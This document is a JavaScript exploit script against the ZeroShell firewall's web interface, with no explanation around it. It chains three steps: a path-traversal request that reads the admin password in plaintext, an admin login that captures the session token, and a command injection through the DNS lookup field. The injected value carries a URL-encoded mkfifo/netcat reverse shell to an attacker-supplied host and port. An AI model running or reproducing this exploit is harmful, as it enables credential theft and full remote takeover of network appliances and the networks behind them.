var h=document.getElementsByTagName('head')[0];
var j=document.createElement('script');
j.src='http://code.jquery.com/jquery-latest.min.js';
h.appendChild(j);

var pwd="";
var token="";

var hash = window.location.hash.substring(1);
var lhost = hash.substring(hash.indexOf("lhost=")+6, hash.indexOf("&"));
var lport = hash.substring(hash.indexOf("lport=")+6, hash.length);

var payload='beef%22+localhost+%26%26+rm+-f+%2Ftmp%2Fx%3Bmkfifo+%2Ftmp%2Fx%3Bcat+%2Ftmp%2Fx%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+' + lhost + '+' + lport + '+%3E+%2Ftmp%2Fx+%23';

setTimeout(function (){
	// first AJAX call in ZeroShell context to retieve the console admin password in plaintext
	$.ajax({ 
		type: 'GET',
		url: "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw",
		contentType: 'application/x-www-form-urlencoded;charset=utf-8',
		success: function(result){
			pwd = result.trim();
			if(pwd != ""){
				// second AJAX call in ZeroShell context to make a valid authentication with login "admin" and the password previously retrived
				$.ajax({ 
					type: 'POST',
					url: "/cgi-bin/kerbynet",
					contentType: 'application/x-www-form-urlencoded;charset=utf-8',
					dataType: 'text',
					data: 'Action=StartSessionSubmit&User=admin&PW='+pwd,
					success: function(result){
						// extract the current session token from the authentication performed
						token = result.substr(result.indexOf("STk=")+4, 40); 
						// third AJAX call in ZeroShell context to spawn a reverse-shell with the right session token
						$.ajax({ 
							type: 'POST',
							url: "/cgi-bin/kerbynet",
							contentType: 'application/x-www-form-urlencoded;charset=utf-8',
							dataType: 'text',
							data: 'Action=Lookup&STk='+token+'&Section=DNS&What='+payload+'&DNS=localhost'
						});
					}
				});
			}
		}
	});
}, 5000);
